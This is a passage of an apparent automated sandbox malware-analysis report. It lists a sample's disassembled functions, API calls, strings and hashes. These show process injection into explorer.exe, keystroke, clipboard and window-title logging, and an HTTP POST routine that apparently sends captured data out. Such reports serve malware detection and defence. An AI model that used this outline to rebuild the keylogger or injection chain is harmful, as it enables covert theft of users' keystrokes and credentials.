                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 007D1ACC
                            • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 007D1AD3
                            • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 007D1AE7
                            • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 007D1AFE
                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 007D1B0B
                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 007D1B11
                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 007D1B17
                            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 007D1B1A
                            Strings
                            Memory Dump Source
                            • Source File: 00000010.00000002.507944127.00000000007D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7d1000_explorer.jbxd
                            Similarity
                            • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                            • String ID: atan$ntdll$opera_shared_counter
                            • API String ID: 1066286714-2737717697
                            • Opcode ID: 79d6a5cd6a251d0a87153af4469ceb9fe536c81ec25709c9c95056b71851bd84
                            • Instruction ID: a2194cf92cf112078c88b58cc5a74e7d832e0a6f5383322f40c08d8edb31662e
                            • Opcode Fuzzy Hash: 79d6a5cd6a251d0a87153af4469ceb9fe536c81ec25709c9c95056b71851bd84
                            • Instruction Fuzzy Hash: 9561AD71205205BFD310DF209C88E6BBBFDEB89754F40851BF949D3291DA78DD048B66
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 007D2799 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 68encryptionstringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 007D27B5
                            • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 007D27CD
                            • lstrlen.KERNEL32(?,00000000), ref: 007D27D5
                            • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 007D27E0
                            • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 007D27FA
                            • wsprintfA.USER32 ref: 007D2811
                            • CryptDestroyHash.ADVAPI32(?), ref: 007D282A
                            • CryptReleaseContext.ADVAPI32(?,00000000), ref: 007D2834
                            Strings
                            Memory Dump Source
                            • Source File: 00000010.00000002.507944127.00000000007D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7d1000_explorer.jbxd
                            Similarity
                            • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                            • String ID: %02X
                            • API String ID: 3341110664-436463671
                            • Opcode ID: 5c8bc9d1193a65664655254c84273d2aafd3cb67921ab842da488113aea73bf2
                            • Instruction ID: 8c62b171cd60cebef7bf6e3bd3122f76a0a635a1be00fac5c171af270d56e278
                            • Opcode Fuzzy Hash: 5c8bc9d1193a65664655254c84273d2aafd3cb67921ab842da488113aea73bf2
                            • Instruction Fuzzy Hash: 20116D7190110CBFDB119B95EC88EEEBFBDEB48301F108066F604E2150D7394F019B65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 007D162B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                            Download Yara Rule
                            APIs
                            • GetKeyboardState.USER32(?), ref: 007D1652
                            • ToUnicode.USER32(0000001B,?,?,?,00000009,00000000), ref: 007D167A
                            Strings
                            Memory Dump Source
                            • Source File: 00000010.00000002.507944127.00000000007D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7d1000_explorer.jbxd
                            Similarity
                            • API ID: KeyboardStateUnicode
                            • String ID:
                            • API String ID: 3453085656-3916222277
                            • Opcode ID: 681fd436ec8e20ecda5fc4937b5a13feb1ae3f363e9e7445c732453f856abbb4
                            • Instruction ID: 375dcb513db66224f8e768702f7e4faf334f3de865193e20a56639d9d1c79341
                            • Opcode Fuzzy Hash: 681fd436ec8e20ecda5fc4937b5a13feb1ae3f363e9e7445c732453f856abbb4
                            • Instruction Fuzzy Hash: E7019632901619BBDB34CB54DE45BFB77BCAF45B00F88441BE901E2251DF38D9458AA6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 007D13AE Relevance: 38.6, APIs: 17, Strings: 5, Instructions: 144libraryloaderthreadCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • RtlZeroMemory.NTDLL(007D5013,0000001C), ref: 007D13C8
                            • VirtualQuery.KERNEL32(007D13AE,?,0000001C), ref: 007D13DA
                            • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 007D140B
                            • GetCurrentProcessId.KERNEL32(00000004), ref: 007D141C
                            • wsprintfA.USER32 ref: 007D1433
                            • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 007D1448
                            • GetLastError.KERNEL32 ref: 007D144E
                            • RtlInitializeCriticalSection.NTDLL(007D582C), ref: 007D1465
                            • Sleep.KERNEL32(000001F4), ref: 007D1489
                            • GetModuleHandleA.KERNEL32(user32.dll,TranslateMessage), ref: 007D14A6
                            • GetProcAddress.KERNEL32(00000000), ref: 007D14AF
                            • GetModuleHandleA.KERNEL32(user32.dll,GetClipboardData), ref: 007D14D0
                            • GetProcAddress.KERNEL32(00000000), ref: 007D14D3
                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 007D14F1
                            • CreateThread.KERNEL32(00000000,00000000,Function_0000082D,00000000,00000000,00000000), ref: 007D150D
                            • CloseHandle.KERNEL32(00000000), ref: 007D1514
                            • RtlExitUserThread.NTDLL(00000000), ref: 007D152A
                            Strings
                            Memory Dump Source
                            • Source File: 00000010.00000002.507944127.00000000007D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7d1000_explorer.jbxd
                            Similarity
                            • API ID: HandleModule$AddressCreateProcThread$CloseCriticalCurrentErrorExitFileInitializeLastMemoryMutexNameProcessQuerySectionSleepUserVirtualZerowsprintf
                            • String ID: %s%d%d%d$GetClipboardData$TranslateMessage$kernel32.dll$user32.dll
                            • API String ID: 3628807430-1779906909
                            • Opcode ID: e20f009623d8ba36e6806488efd04c05249e07a6c1ca89c954eac838954f72ac
                            • Instruction ID: 4ab0a911c13f1babb38a1196c6bc9c90e71ed6769da737b5905d5986cf54a7b1
                            • Opcode Fuzzy Hash: e20f009623d8ba36e6806488efd04c05249e07a6c1ca89c954eac838954f72ac
                            • Instruction Fuzzy Hash: BC41A0B0601304FBD710AB75EC1DE5A3BB9EB84751B40802BF90696391DB7D9A018BA6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 007D16B9 Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 90stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • RtlEnterCriticalSection.NTDLL(007D582C), ref: 007D16C4
                            • lstrlenW.KERNEL32 ref: 007D16DB
                            • lstrlenW.KERNEL32 ref: 007D16F3
                            • wsprintfW.USER32 ref: 007D1743
                            • GetForegroundWindow.USER32 ref: 007D174E
                            • GetWindowTextW.USER32(00000000,007D5850,00000800), ref: 007D1767
                            • GetClassNameW.USER32(00000000,007D5850,00000800), ref: 007D1774
                            • lstrcmpW.KERNEL32(007D5020,007D5850), ref: 007D1781
                            • lstrcpyW.KERNEL32(007D5020,007D5850), ref: 007D178D
                            • wsprintfW.USER32 ref: 007D17AD
                            • lstrcatW.KERNEL32 ref: 007D17C6
                            • RtlLeaveCriticalSection.NTDLL(007D582C), ref: 007D17D3
                            Strings
                            Memory Dump Source
                            • Source File: 00000010.00000002.507944127.00000000007D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7d1000_explorer.jbxd
                            Similarity
                            • API ID: CriticalSectionWindowlstrlenwsprintf$ClassEnterForegroundLeaveNameTextlstrcatlstrcmplstrcpy
                            • String ID: Clipboard -> $ New Window Caption -> $ P}$%s%s%s$%s%s%s%s$PX}
                            • API String ID: 2651329914-2303171855
                            • Opcode ID: 11d51ccbee293d27839d904d8878a94e59fa3ca853bc4bbd7039a48a4f442624
                            • Instruction ID: d7a5547d80182d5c240ba9a0beeefef79670568f8179783a9dd40ccd59ebb986
                            • Opcode Fuzzy Hash: 11d51ccbee293d27839d904d8878a94e59fa3ca853bc4bbd7039a48a4f442624
                            • Instruction Fuzzy Hash: 4A217134602619FBD3212B35FC89E2B3F79EB41B657448027F40192371DA2D9E01D6BA
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 007D25F1 Relevance: 15.1, APIs: 10, Instructions: 51threadprocessinjectionCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • GetCurrentProcessId.KERNEL32 ref: 007D2603
                            • GetCurrentThreadId.KERNEL32 ref: 007D260B
                            • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 007D261B
                            • Thread32First.KERNEL32(00000000,0000001C), ref: 007D2629
                            • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 007D2648
                            • SuspendThread.KERNEL32(00000000), ref: 007D2658
                            • CloseHandle.KERNEL32(00000000), ref: 007D2667
                            • Thread32Next.KERNEL32(00000000,0000001C), ref: 007D2677
                            • CloseHandle.KERNEL32(00000000), ref: 007D2682
                            Memory Dump Source
                            • Source File: 00000010.00000002.507944127.00000000007D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7d1000_explorer.jbxd
                            Similarity
                            • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                            • String ID:
                            • API String ID: 1467098526-0
                            • Opcode ID: ff53ae0283614e0bfe026943573d870ae3076223c3cd0dc12133f6f8a17190c4
                            • Instruction ID: 58be803257f0e8a7711309f4d03fe2af4e4edced5360aeda8c1c8db3630abafc
                            • Opcode Fuzzy Hash: ff53ae0283614e0bfe026943573d870ae3076223c3cd0dc12133f6f8a17190c4
                            • Instruction Fuzzy Hash: E5113071406300EFD701AF60AD4CA6EBBB5EF95711F04846BFA4592650D738CA4A8BAB
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 007D20A1 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 283COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 294 7d20a1-7d20fc call 7d240f call 7d2a09 call 7d298a call 7d24cc 303 7d20fe-7d2115 294->303 304 7d2117-7d2123 294->304 307 7d2127-7d2129 303->307 304->307 308 7d23fd-7d240c call 7d29eb 307->308 309 7d212f-7d2166 RtlZeroMemory 307->309 313 7d216c-7d2187 309->313 314 7d23f5-7d23fc 309->314 315 7d21b9-7d21cb 313->315 316 7d2189-7d219a call 7d243d 313->316 314->308 323 7d21cf-7d21d1 315->323 321 7d21ad 316->321 322 7d219c-7d21ab 316->322 324 7d21af-7d21b7 321->324 322->324 325 7d21d7-7d2233 call 7d288d 323->325 326 7d23e2-7d23e8 323->326 324->323 334 7d2239-7d223e 325->334 335 7d23db 325->335 328 7d23ea-7d23ec call 7d29eb 326->328 329 7d23f1 326->329 328->329 329->314 336 7d2258-7d2286 call 7d2a09 wsprintfW 334->336 337 7d2240-7d2251 334->337 335->326 340 7d229f-7d22b6 336->340 341 7d2288-7d228a 336->341 337->336 347 7d22b8-7d22ee call 7d2a09 wsprintfW 340->347 348 7d22f5-7d230f 340->348 342 7d228b-7d228e 341->342 343 7d2299-7d229b 342->343 344 7d2290-7d2295 342->344 343->340 344->342 346 7d2297 344->346 346->340 347->348 352 7d23b8-7d23ce call 7d29eb 348->352 353 7d2315-7d2328 348->353 361 7d23d7 352->361 362 7d23d0-7d23d2 call 7d29eb 352->362 353->352 356 7d232e-7d2344 call 7d2a09 353->356 363 7d2346-7d2351 356->363 361->335 362->361 365 7d2365-7d237c 363->365 366 7d2353-7d2360 call 7d29ce 363->366 370 7d237e 365->370 371 7d2380-7d238d 365->371 366->365 370->371 371->363 372 7d238f-7d2393 371->372 373 7d23ad-7d23b4 call 7d29eb 372->373 374 7d2395 372->374 373->352 375 7d2395 call 7d29bd 374->375 377 7d239a-7d23a7 RtlMoveMemory 375->377 377->373
                            APIs
                              • Part of subcall function 007D2A09: GetProcessHeap.KERNEL32(00000008,0000A000,007D10BF), ref: 007D2A0C
                              • Part of subcall function 007D2A09: RtlAllocateHeap.NTDLL(00000000), ref: 007D2A13
                              • Part of subcall function 007D298A: lstrlen.KERNEL32(007D4FE2,?,00000000,00000000,007D20DD,772D81D0,007D4FE2,00000000), ref: 007D2992
                              • Part of subcall function 007D298A: MultiByteToWideChar.KERNEL32(00000000,00000000,007D4FE2,00000001,00000000,00000000), ref: 007D29A4
                              • Part of subcall function 007D24CC: RtlZeroMemory.NTDLL(?,00000018), ref: 007D24DE
                            • RtlZeroMemory.NTDLL(?,0000003C), ref: 007D2139
                            • wsprintfW.USER32 ref: 007D2272
                            • wsprintfW.USER32 ref: 007D22DD
                            • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 007D23A7
                            Strings
                            Memory Dump Source
                            • Source File: 00000010.00000002.507944127.00000000007D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7d1000_explorer.jbxd
                            Similarity
                            • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                            • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                            • API String ID: 4204651544-1701262698
                            • Opcode ID: 14a160b8188279f7c7433862928164794a8b12d594bb980d30e741dbfd3f0bf7
                            • Instruction ID: cf0b7ff80486844150217632e224203ef1ddf33fc336300db518042828845c11
                            • Opcode Fuzzy Hash: 14a160b8188279f7c7433862928164794a8b12d594bb980d30e741dbfd3f0bf7
                            • Instruction Fuzzy Hash: 9EA17E71609345AFD3109F68D884A2BBBF8FF98740F14482EF985D3352DA39DD068B56
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 007D24CC Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 61COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 379 7d24cc-7d24f0 RtlZeroMemory 381 7d2514 379->381 382 7d24f2-7d2504 379->382 383 7d2517-7d2519 381->383 382->381 384 7d2506-7d2512 382->384 385 7d251b-7d2545 383->385 386 7d2554-7d2559 383->386 384->383 389 7d254c-7d2553 385->389 390 7d2547-7d254a 385->390 389->386 390->389
                            APIs
                            • RtlZeroMemory.NTDLL(?,00000018), ref: 007D24DE
                            Strings
                            Memory Dump Source
                            • Source File: 00000010.00000002.507944127.00000000007D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7d1000_explorer.jbxd
                            Similarity
                            • API ID: MemoryZero
                            • String ID: }$O}$O}$O} }
                            • API String ID: 816449071-2910888726
                            • Opcode ID: ff308239831f2db645752f4cfb6d106c2c0b2b25080865b139d6909b991d4a6d
                            • Instruction ID: f21b25b43a37e5c6598b2122af5d5013f3bddae613a44cc62f9f6153c5f43908
                            • Opcode Fuzzy Hash: ff308239831f2db645752f4cfb6d106c2c0b2b25080865b139d6909b991d4a6d
                            • Instruction Fuzzy Hash: 811100B1A01209AFDB10DFA9E884EBEB7BDEB58701B10406AF945D3240D735DD05CB75
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 007D182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42sleepstringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • RtlEnterCriticalSection.NTDLL(007D582C), ref: 007D1839
                            • lstrlenW.KERNEL32 ref: 007D1845
                            • RtlLeaveCriticalSection.NTDLL(007D582C), ref: 007D18A9
                            • Sleep.KERNEL32(00007530), ref: 007D18B4
                            Strings
                            Memory Dump Source
                            • Source File: 00000010.00000002.507944127.00000000007D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7d1000_explorer.jbxd
                            Similarity
                            • API ID: CriticalSection$EnterLeaveSleeplstrlen
                            • String ID: ,X}
                            • API String ID: 2134730579-2462104651
                            • Opcode ID: b8f3d0327589d08482105c38e3ab20b21bc73060d32d9c4d488794a5d2ed1ade
                            • Instruction ID: fdc71ac79996955f0495916f09cccdce6b780fe24a349ca46132d45a9f00cb75
                            • Opcode Fuzzy Hash: b8f3d0327589d08482105c38e3ab20b21bc73060d32d9c4d488794a5d2ed1ade
                            • Instruction Fuzzy Hash: D1016770616500EBD714A775ED5D92E3BB9EB41710714802BF405D7362EA3C9D03A7B6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 007D12AE Relevance: 7.6, APIs: 5, Instructions: 93stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 409 7d12ae-7d12bf 410 7d12c5-7d12c7 409->410 411 7d13a6-7d13ad 409->411 410->411 412 7d12cd-7d12cf 410->412 413 7d12d4 call 7d29bd 412->413 414 7d12d9-7d12fc lstrlen call 7d2a09 413->414 417 7d136e-7d1377 call 7d29eb 414->417 418 7d12fe-7d1327 call 7d2841 RtlZeroMemory 414->418 423 7d139d-7d13a5 call 7d29ae 417->423 424 7d1379-7d137d 417->424 425 7d1329-7d134f RtlMoveMemory call 7d2569 418->425 426 7d1353-7d1369 RtlMoveMemory call 7d2569 418->426 423->411 428 7d137f-7d1392 call 7d255c PathMatchSpecA 424->428 425->418 434 7d1351 425->434 426->417 436 7d139b 428->436 437 7d1394-7d1397 428->437 434->417 436->423 437->428 438 7d1399 437->438 438->423
                            APIs
                              • Part of subcall function 007D29BD: VirtualAlloc.KERNEL32(00000000,00040744,00003000,00000040,007D12D9,00000000,00000000,?,00000001), ref: 007D29C7
                            • lstrlen.KERNEL32(00000000,00000000,00000000,?,00000001), ref: 007D12DC
                              • Part of subcall function 007D2A09: GetProcessHeap.KERNEL32(00000008,0000A000,007D10BF), ref: 007D2A0C
                              • Part of subcall function 007D2A09: RtlAllocateHeap.NTDLL(00000000), ref: 007D2A13
                            • PathMatchSpecA.SHLWAPI(?,00000000), ref: 007D138A
                              • Part of subcall function 007D2841: lstrlen.KERNEL32(00000000,?,?,00000001,00000000,007D1119,00000001), ref: 007D2850
                              • Part of subcall function 007D2841: lstrlen.KERNEL32(keylog_rules=,?,?,00000001,00000000,007D1119,00000001), ref: 007D2855
                            • RtlZeroMemory.NTDLL(00000000,00000104), ref: 007D1316
                            • RtlMoveMemory.NTDLL(00000000,?,?), ref: 007D1332
                              • Part of subcall function 007D2569: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,007D136E), ref: 007D2591
                              • Part of subcall function 007D2569: RtlMoveMemory.NTDLL(00000FA4,00000000,00000000), ref: 007D259A
                            • RtlMoveMemory.NTDLL(00000000,?,?), ref: 007D135F
                            Memory Dump Source
                            • Source File: 00000010.00000002.507944127.00000000007D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7d1000_explorer.jbxd
                            Similarity
                            • API ID: Memorylstrlen$Move$Heap$AllocAllocateMatchPathProcessSpecVirtualZero
                            • String ID:
                            • API String ID: 2993730741-0
                            • Opcode ID: 65c39b0fc3b5a26d7166fe7ab80799310c3c0fa63b8b88d13c45dafedbf20469
                            • Instruction ID: 9c28d7f8061beb60fe93ce625b97f4ab4480d069beb168330fa920b6397c1522
                            • Opcode Fuzzy Hash: 65c39b0fc3b5a26d7166fe7ab80799310c3c0fa63b8b88d13c45dafedbf20469
                            • Instruction Fuzzy Hash: 7A217C70704202AF8304EF28985997EB7FAAB94710B50052FF856D3742DB3DED0A8B66
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 007D1581 Relevance: 7.6, APIs: 5, Instructions: 66stringCOMMON
                            Download Yara Rule
                            APIs
                            • GlobalFix.KERNEL32(00000000), ref: 007D15A9
                            • lstrlenW.KERNEL32(00000000), ref: 007D15C6
                            • lstrcatW.KERNEL32(00000000,00000000), ref: 007D15DC
                            • lstrlenW.KERNEL32(00000000), ref: 007D1600
                            • GlobalUnWire.KERNEL32(00000000), ref: 007D161C
                            Memory Dump Source
                            • Source File: 00000010.00000002.507944127.00000000007D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7d1000_explorer.jbxd
                            Similarity
                            • API ID: Globallstrlen$Wirelstrcat
                            • String ID:
                            • API String ID: 2993198917-0
                            • Opcode ID: 77afdcd5382a5974637ef43b522c038981940292fca810951e74bc6f864f108e
                            • Instruction ID: bd31e8e5657274c33b389d992fd9e1a8c09e924c3fdb2fa68c1735dabcaf4723
                            • Opcode Fuzzy Hash: 77afdcd5382a5974637ef43b522c038981940292fca810951e74bc6f864f108e
                            • Instruction Fuzzy Hash: 2901C032A05111BB962567797D985BE63BEDFD6711749803BF80BA3313DE2CCD034256
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 007D1BBD Relevance: 6.1, APIs: 4, Instructions: 101libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • RtlMoveMemory.NTDLL(?,?,?), ref: 007D1BF4
                            • LoadLibraryA.KERNEL32(?,007D5848,00000000,00000000,772EF560,00000000,007D19B6,?,?,?,00000001,?,00000000), ref: 007D1C1C
                            • GetProcAddress.KERNEL32(00000000,-00000002), ref: 007D1C49
                            • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 007D1C9A
                            Memory Dump Source
                            • Source File: 00000010.00000002.507944127.00000000007D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7d1000_explorer.jbxd
                            Similarity
                            • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                            • String ID:
                            • API String ID: 3827878703-0
                            • Opcode ID: a9e96ee26061a314dad4b73c1319980ff21af834bf79b67b7368b20f4cadbacf
                            • Instruction ID: bbfaba5ac992a7ebe707afccd3ceb2d32dcd50c097c646478fb02ada39540fe3
                            • Opcode Fuzzy Hash: a9e96ee26061a314dad4b73c1319980ff21af834bf79b67b7368b20f4cadbacf
                            • Instruction Fuzzy Hash: E3318E71750616BFCB18CF29C984B66B7B8BF15315B94852EE84AC7700D73AE845CBB0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 007D26C9 Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                            Download Yara Rule
                            APIs
                            • OpenProcess.KERNEL32(00000400,00000000,?,?,00000001,?,00000000,007D11DD), ref: 007D26DB
                            • IsWow64Process.KERNEL32(000000FF,?), ref: 007D26ED
                            • IsWow64Process.KERNEL32(00000000,?), ref: 007D2700
                            • CloseHandle.KERNEL32(00000000), ref: 007D2716
                            Memory Dump Source
                            • Source File: 00000010.00000002.507944127.00000000007D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7d1000_explorer.jbxd
                            Similarity
                            • API ID: Process$Wow64$CloseHandleOpen
                            • String ID:
                            • API String ID: 331459951-0
                            • Opcode ID: 2fd555411080ece144841e11095ccbf700dab3098e7dda369da56aefb3ec0632
                            • Instruction ID: caee7bbc6510dff2f8fcb73646c72944a4eb25a23e0a419ed02bcda4b2284bff
                            • Opcode Fuzzy Hash: 2fd555411080ece144841e11095ccbf700dab3098e7dda369da56aefb3ec0632
                            • Instruction Fuzzy Hash: 88F0B471902218FF9B21CFA09D488FEB7BDEF05361B14426BEA0493240D7384F0296B5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 007D17DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31timeCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 007D2A09: GetProcessHeap.KERNEL32(00000008,0000A000,007D10BF), ref: 007D2A0C
                              • Part of subcall function 007D2A09: RtlAllocateHeap.NTDLL(00000000), ref: 007D2A13
                            • GetLocalTime.KERNEL32(?,00000000), ref: 007D17F3
                            • wsprintfW.USER32 ref: 007D181D
                            Strings
                            • [%02d.%02d.%d %02d:%02d:%02d], xrefs: 007D1817
                            Memory Dump Source
                            • Source File: 00000010.00000002.507944127.00000000007D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7d1000_explorer.jbxd
                            Similarity
                            • API ID: Heap$AllocateLocalProcessTimewsprintf
                            • String ID: [%02d.%02d.%d %02d:%02d:%02d]
                            • API String ID: 377395780-613334611
                            • Opcode ID: 74866266c0996e1a6fab98b9c844323fdeb0100b28ba5d54a158a00d3a17ee74
                            • Instruction ID: 39f10ddce383216ce04b974c1cae4ad6e8990ac5d16bdd467752c69c51d0ed48
                            • Opcode Fuzzy Hash: 74866266c0996e1a6fab98b9c844323fdeb0100b28ba5d54a158a00d3a17ee74
                            • Instruction Fuzzy Hash: BDF03066900128BA87146BD99D059FFB3FCEB0CB02B00019BFA51E1181E67D5A50D3B9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Callgraph

                            • Executed
                            • Not Executed
                            • Opacity -> Relevance
                            • Disassembly available
                            callgraph 0 Function_00AD31AC 5 Function_00AD25A8 0->5 13 Function_00AD1838 0->13 41 Function_00AD1B10 0->41 51 Function_00AD1860 0->51 58 Function_00AD26F8 0->58 78 Function_00AD1D54 0->78 1 Function_00AD2E2C 20 Function_00AD188C 1->20 1->51 69 Function_00AD2DC0 1->69 2 Function_00AD20AC 23 Function_00AD1A88 2->23 3 Function_00AD1CAC 4 Function_00ADB4A8 49 Function_00ADB46A 4->49 32 Function_00AD2580 5->32 45 Function_00AD2768 5->45 80 Function_00AD18D0 5->80 6 Function_00AD1D24 7 Function_00AD27A0 8 Function_00AD1822 9 Function_00AD19BC 10 Function_00AD2FBC 10->1 11 Function_00ADB2BE 11->4 12 Function_00AD4038 14 Function_00AD1938 14->13 14->51 15 Function_00AD24B8 15->13 15->51 61 Function_00AD20F4 15->61 16 Function_00ADAAB0 17 Function_00AD14B2 18 Function_00ADAC8D 19 Function_00AD370C 19->0 19->13 19->19 43 Function_00AD1C6C 19->43 67 Function_00AD34C4 19->67 20->13 21 Function_00AD1F0C 22 Function_00AD1508 24 Function_00AD1405 25 Function_00AD1D04 26 Function_00AD2A04 37 Function_00AD2918 26->37 26->43 68 Function_00AD27C4 26->68 27 Function_00ADB007 28 Function_00ADA881 29 Function_00ADAD00 30 Function_00AD1000 31 Function_00AD1F00 33 Function_00AD141D 34 Function_00ADAB9C 35 Function_00AD1E9C 36 Function_00AD1E1C 36->13 38 Function_00AD2D14 38->13 38->15 38->36 46 Function_00AD18E8 38->46 38->51 39 Function_00AD3394 39->13 39->23 39->35 39->46 39->51 59 Function_00AD1EF8 39->59 39->80 40 Function_00ADB291 42 Function_00AD156C 44 Function_00ADA8E8 45->7 47 Function_00AD3068 47->1 47->13 47->14 47->43 47->51 48 Function_00ADADEA 50 Function_00AD2664 51->43 52 Function_00AD1560 53 Function_00ADAFE3 54 Function_00AD14F9 55 Function_00AD5579 56 Function_00AD1BF8 57 Function_00AD18F8 58->32 58->43 58->50 60 Function_00AD1EFA 61->2 61->9 61->13 61->20 61->21 61->51 61->57 70 Function_00AD1FDC 61->70 61->80 62 Function_00ADAFF6 63 Function_00AD1576 64 Function_00AD1C4C 65 Function_00ADABCF 66 Function_00ADB148 67->3 67->6 67->9 67->13 67->23 67->25 67->26 67->39 67->43 67->51 67->56 67->64 69->13 70->13 70->57 71 Function_00ADB2DF 72 Function_00ADB358 72->4 73 Function_00ADC0D8 74 Function_00AD3158 75 Function_00ADB15B 76 Function_00AD1254 77 Function_00AD14D4 79 Function_00ADABD7 81 Function_00ADAAD2

                            Executed Functions

                            Function 00AD370C Relevance: 1.6, APIs: 1, Instructions: 75nativeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 116 ad370c-ad371c call ad1c6c 119 ad37b0-ad37b5 116->119 120 ad3722-ad3754 call ad1838 116->120 124 ad3785-ad37aa NtUnmapViewOfSection 120->124 125 ad3756-ad375b call ad1838 120->125 129 ad37bc-ad37cb call ad34c4 124->129 130 ad37ac-ad37ae 124->130 127 ad3760-ad3779 125->127 127->124 136 ad37cd-ad37d0 call ad370c 129->136 137 ad37d5-ad37de 129->137 130->119 132 ad37b6-ad37bb call ad31ac 130->132 132->129 136->137
                            APIs
                            • NtUnmapViewOfSection.NTDLL ref: 00AD378C
                            Memory Dump Source
